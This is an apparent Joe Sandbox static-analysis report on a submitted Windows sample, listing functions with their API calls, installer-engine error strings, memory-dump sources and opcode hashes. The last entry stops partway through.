BootstrapperApplicationDestroy, xrefs: 0099D8FB

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: 2abca91258e7676e182c3cc87c2df7ea920f08f6e8352338724618f0e73cdb61
Instruction ID: d309028486113ed173282cd800f63769cc1333aff47739d9a3890bf3bb9db086
Opcode Fuzzy Hash: 2abca91258e7676e182c3cc87c2df7ea920f08f6e8352338724618f0e73cdb61
Instruction Fuzzy Hash: 4CF0F632702626ABC7205F6ED804B2AF7A8FF05B62702822AE824D6520C770EC50DBD0

Function 009D31EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 009D3200
SysFreeString.OLEAUT32(00000000), ref: 009D3230

Strings

`5w, xrefs: 009D3230
xmlutil.cpp, xrefs: 009D3214

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: ebca757baa9d98f1c038fa0adb51679c54c3bf46fbfed65a06080427aef88cd6
Instruction ID: a456c38720eb935f236e54a456c97137b035f9dc667135d8b0f7275983796702
Opcode Fuzzy Hash: ebca757baa9d98f1c038fa0adb51679c54c3bf46fbfed65a06080427aef88cd6
Instruction Fuzzy Hash: B6F0E935982655E7C7311FC49C08F6BB7A8AF80B61F15C02AFD1457310C7748E50A6D1

Function 009D3498 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 009D34AD
SysFreeString.OLEAUT32(00000000), ref: 009D34DD

Strings

`5w, xrefs: 009D34DD
xmlutil.cpp, xrefs: 009D34C4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: 94c11bf483e2a93032fcf33622edb9167a48a8c47e0d3d4f4ebb04375f45e37c
Instruction ID: 29b49085874c33b4ee7425196481709583fc6859c3513cdcec3e852b004a68a6
Opcode Fuzzy Hash: 94c11bf483e2a93032fcf33622edb9167a48a8c47e0d3d4f4ebb04375f45e37c
Instruction Fuzzy Hash: 95F05435282215E7CB335F49AC08E5B77A8AB81B62F15C117FC1567320C779DE50A6E1

Function 009AF2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 009AF2EE
GetLastError.KERNEL32 ref: 009AF2F8

Strings

Failed to post plan message., xrefs: 009AF326
EngineForApplication.cpp, xrefs: 009AF31C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: e040545e2a2466b4c7f34833b2ae2f3f91d1121410aeed1e6d0a222e38113056
Instruction ID: af9f839ddb647e402524616248f713e8bb0a3e2e7efa20e1292a20b4159d5d73
Opcode Fuzzy Hash: e040545e2a2466b4c7f34833b2ae2f3f91d1121410aeed1e6d0a222e38113056
Instruction Fuzzy Hash: 29F0AE33655235B7DF2156D75C09A4B7F84EF45BF0B024121BE54AB191EA509C0091D4

Function 009AF3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 009AF3FC
GetLastError.KERNEL32 ref: 009AF406

Strings

EngineForApplication.cpp, xrefs: 009AF42A
Failed to post shutdown message., xrefs: 009AF434

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: 997d4ca8f20e2ed46d75dd9923494a341599efcb0f71838a7a73fb2724da5bb2
Instruction ID: e38261e91d52196d25b814f4ba3ece0acf5801f97a1e879636cba2daf016927e
Opcode Fuzzy Hash: 997d4ca8f20e2ed46d75dd9923494a341599efcb0f71838a7a73fb2724da5bb2
Instruction Fuzzy Hash: 4FF0A737696635A7CA311ADA6C0DF477BD8AF49B60B024026BE14BB2A1E6509C0096D4

Function 009B07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(009DB478,00000000,?,009B1717,?,00000000,?,0099C287,?,00995405,?,009A75A5,?,?,00995405,?), ref: 009B07BF
GetLastError.KERNEL32(?,009B1717,?,00000000,?,0099C287,?,00995405,?,009A75A5,?,?,00995405,?,00995445,00000001), ref: 009B07C9

Strings

cabextract.cpp, xrefs: 009B07ED
Failed to set begin operation event., xrefs: 009B07F7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 9ab302723b7db7a42fee92ff0a41f04a14d435106540d7bc4d233f66c4a741a5
Instruction ID: 3a1557256cf8190f7b8c92ec26d00c723b92d1bf41a7c8d7cc454dc12edcde18
Opcode Fuzzy Hash: 9ab302723b7db7a42fee92ff0a41f04a14d435106540d7bc4d233f66c4a741a5
Instruction Fuzzy Hash: 56F0EC37683635A7862116D65E05BCF7B8C9F85FB0B124126FF01B7250FA15AC10C6D5

Function 009AEBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 009AEBE0
GetLastError.KERNEL32 ref: 009AEBEA

Strings

EngineForApplication.cpp, xrefs: 009AEC0E
Failed to post apply message., xrefs: 009AEC18

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: b244908134f476c49591bd47d8422e3c5bd052a54ae04d9cdc42597230a8492f
Instruction ID: 2c33b9e94e9703f2e038dbf0c1f0ee500a798235cc6f69edc0ead17d81e6de60
Opcode Fuzzy Hash: b244908134f476c49591bd47d8422e3c5bd052a54ae04d9cdc42597230a8492f
Instruction Fuzzy Hash: 76F0EC33A92235B7DA31269A9C0DF4BBF98EF45FB0B024015FE58BF291E660DC0092D0

Function 009AEC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 009AEC71
GetLastError.KERNEL32 ref: 009AEC7B

Strings

EngineForApplication.cpp, xrefs: 009AEC9F
Failed to post detect message., xrefs: 009AECA9

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 723ee969e4894610d42ae0884437d3aafbdbea20d7311c22b6870cbf46e92868
Instruction ID: 66a0b04618cf2b4b3bdd5bfae65890066d4d2f742abc2676ad7a6f8d605c2b41
Opcode Fuzzy Hash: 723ee969e4894610d42ae0884437d3aafbdbea20d7311c22b6870cbf46e92868
Instruction Fuzzy Hash: FCF0A737682235A7DA31569A9C09F47BF98AF45BB0F028011BE54AB291E6609C00D1D4

Function 009C6B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 009C6C01
__alldvrm.LIBCMT ref: 009C6E02
__alldvrm.LIBCMT ref: 009C6E24

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction ID: d3fde8573ae0592fbb179d6165463ef420229c20d6ff446aca31378fc8ed3098
Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction Fuzzy Hash: C9A17A76E003869FDB21CF28CC91FAEBBE9EF55310F18416EE5859B282C6388D41C752

Function 009D5EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 009D5F92
lstrlenW.KERNEL32(00000000), ref: 009D5FAA

Strings

dlutil.cpp, xrefs: 009D6033

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen
String ID: dlutil.cpp
API String ID: 1659193697-2067379296
Opcode ID: 8bfbeab048c0ee2bca957a0651d8078276ae7c965f7d948e420b35919cfce85e
Instruction ID: b56c85690c377d23be6d65ed6d6d0bf8db6fbd0fb0255ea845a3fe0785d41d12
Opcode Fuzzy Hash: 8bfbeab048c0ee2bca957a0651d8078276ae7c965f7d948e420b35919cfce85e
Instruction Fuzzy Hash: C151A172941619ABDB119FE9CD80AAFBBBDAF88710F168026F904A7350D771DD40DBA0

Function 009C922B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,009C2444,00000000,00000000,009C3479,?,009C3479,?,00000001,009C2444,ECE85006,00000001,009C3479,009C3479), ref: 009C9278
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C9301
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009C9313
__freea.LIBCMT ref: 009C931C

Part of subcall function 009C521A: HeapAlloc.KERNEL32(00000000,?,?,?,009C1F87,?,0000015D,?,?,?,?,009C33E0,000000FF,00000000,?,?), ref: 009C524C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: 7983494e4a2e2d7c35938f9987fd2507db4348f6c4755ba7621046e3ccd769ba
Instruction ID: dbc454f0c207b43e113b4a3031ffa3b56a9080bd91d3b62e1bd8a47cb853db44
Opcode Fuzzy Hash: 7983494e4a2e2d7c35938f9987fd2507db4348f6c4755ba7621046e3ccd769ba
Instruction Fuzzy Hash: 6C31AD32E1020AABDF249F64CC89EAE7BA9EB40310F05412DFC14D72A5E735DD91DBA1

Function 00994FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,?,00995552,?,?,?,?,?,?), ref: 00994FFE
DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00995552,?,?,?,?,?,?), ref: 00995012
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00995552,?,?), ref: 00995101
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00995552,?,?), ref: 00995108

Part of subcall function 00991161: LocalFree.KERNEL32(?,?,00994FBB,?,00000000,?,00995552,?,?,?,?,?,?), ref: 0099116B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalDeleteFreeSection$CloseHandleLocal
String ID:
API String ID: 3671900028-0
Opcode ID: 1a5f57790b1633dcaff96fa444d629ef2a9b1c022298f74c42353f691024dd43
Instruction ID: 170dd91e9f39764baf7b710193fd045e3316896bc74d829583e298e9f44762dc
Opcode Fuzzy Hash: 1a5f57790b1633dcaff96fa444d629ef2a9b1c022298f74c42353f691024dd43
Instruction Fuzzy Hash: 0E41FCB1540B05ABDE31EBB8C889F9B73ECAF44340F85482AB6AAD3151EB34F5458764

Function 00994C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0099F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00994CA5,?,?,00000001), ref: 0099F9BC

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00994D0C

Strings

Failed to get current process path., xrefs: 00994CCA
Unable to get resume command line from the registry, xrefs: 00994CAB
Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00994CF6

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Close$Handle
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 187904097-642631345
Opcode ID: 46b75d8ca21bbec22a253ec3513cb233c1da53c82c7bf04ae5d03563d63fe954
Instruction ID: 72ec383a13b26773f3d5272db51638844b86913499d160f64262c3be7b213dc3
Opcode Fuzzy Hash: 46b75d8ca21bbec22a253ec3513cb233c1da53c82c7bf04ae5d03563d63fe954
Instruction Fuzzy Hash: 29114F75D4151CFBCF22AB99DC01DAEBBB8EF80710B118196F910B6310E7319A51DB80

Function 009C88B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009C8A56,00000000,00000000,?,009C8859,009C8A56,00000000,00000000,00000000,?,009C8A56,00000006,FlsSetValue), ref: 009C88E4
GetLastError.KERNEL32(?,009C8859,009C8A56,00000000,00000000,00000000,?,009C8A56,00000006,FlsSetValue,009F2404,009F240C,00000000,00000364,?,009C6230), ref: 009C88F0
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009C8859,009C8A56,00000000,00000000,00000000,?,009C8A56,00000006,FlsSetValue,009F2404,009F240C,00000000), ref: 009C88FE

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 520541345c5e3a4d8e41117795cbd5a2628703f13640fe357c13cd6aa5786b96
Instruction ID: 0b37217641a839c218384edc2df59bcd36472b506895de2e69441286cbd7bf4d
Opcode Fuzzy Hash: 520541345c5e3a4d8e41117795cbd5a2628703f13640fe357c13cd6aa5786b96
Instruction Fuzzy Hash: C401D832A69226EBCB214A69DC44F77779CEF05BA17110529F915E3141DF30DC00C7E2

Function 009C615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,009C1AEC,00000000,80004004,?,009C1DF0,00000000,80004004,00000000,00000000), ref: 009C6162
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009C61CA
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009C61D6
_abort.LIBCMT ref: 009C61DC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 2b5ec63aebec205b9f35ce23e2fc34ce8332b56a2871c67121c2d460a9d5825c
Instruction ID: e721e02307b4dac78958d24c845e5898f49be4f130c233b8cbda5154e47fa802
Opcode Fuzzy Hash: 2b5ec63aebec205b9f35ce23e2fc34ce8332b56a2871c67121c2d460a9d5825c
Instruction Fuzzy Hash: F4F0A936D4CA01ABD2123B256C0DF2F16598BC5772B2F011DFA2996193FF64A8415327

Function 00997435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00997441
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 009974A8

Strings

Failed to get value of variable: %ls, xrefs: 0099747B
Failed to get value as numeric for variable: %ls, xrefs: 00997497

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: ff8a98b9e7c8ca9055146c3b9571f5a0a198462928727b0017f6d0593ca080df
Instruction ID: 744f009671610960ba8581e931e39872c36b84800373e911b51a7bc806605ace
Opcode Fuzzy Hash: ff8a98b9e7c8ca9055146c3b9571f5a0a198462928727b0017f6d0593ca080df
Instruction Fuzzy Hash: 7101D832999128FBCF115F98CC05B9EBF6AAF00721F018125FC04A6232CB369E1097D0

Function 009975AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009975B6
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0099761D

Strings

Failed to get value as version for variable: %ls, xrefs: 0099760C
Failed to get value of variable: %ls, xrefs: 009975F0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: 78614d7db5c6aae736e76fb54ea747bbe464b6651d1db3d9ef23a26b6e76e1db
Instruction ID: e56280f3b714f556eb6d8636c27d7e3d177753a76907990b531b3e476af751ba
Opcode Fuzzy Hash: 78614d7db5c6aae736e76fb54ea747bbe464b6651d1db3d9ef23a26b6e76e1db
Instruction Fuzzy Hash: DB01D472969529FBCF115FC8CC09B9EBB28EF10720F018161FD04AA221DB369E50A7D5

Function 00997539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00999897,00000000,?,00000000,00000000,00000000,?,009996D6,00000000,?,00000000,00000000), ref: 00997545
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00999897,00000000,?,00000000,00000000,00000000,?,009996D6,00000000,?,00000000), ref: 0099759B

Strings

Failed to copy value of variable: %ls, xrefs: 0099758A
Failed to get value of variable: %ls, xrefs: 0099756B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: 8d5f20cd799889fd3daf1cda76ac4b6189b383480468dfd781ed0ad958489690
Instruction ID: 2e72ff1411516a90ec7e0ffc7097e76e06b3afbc6cf1b5a55c786b06b1265cca
Opcode Fuzzy Hash: 8d5f20cd799889fd3daf1cda76ac4b6189b383480468dfd781ed0ad958489690
Instruction Fuzzy Hash: B7F0A47299512DFBCF125F98CC09E9EBF28EF54761F018111FD04A6260C7369E20A7D1

Function 009BE776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 009BE788
GetCurrentThreadId.KERNEL32 ref: 009BE797
GetCurrentProcessId.KERNEL32 ref: 009BE7A0
QueryPerformanceCounter.KERNEL32(?), ref: 009BE7AD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
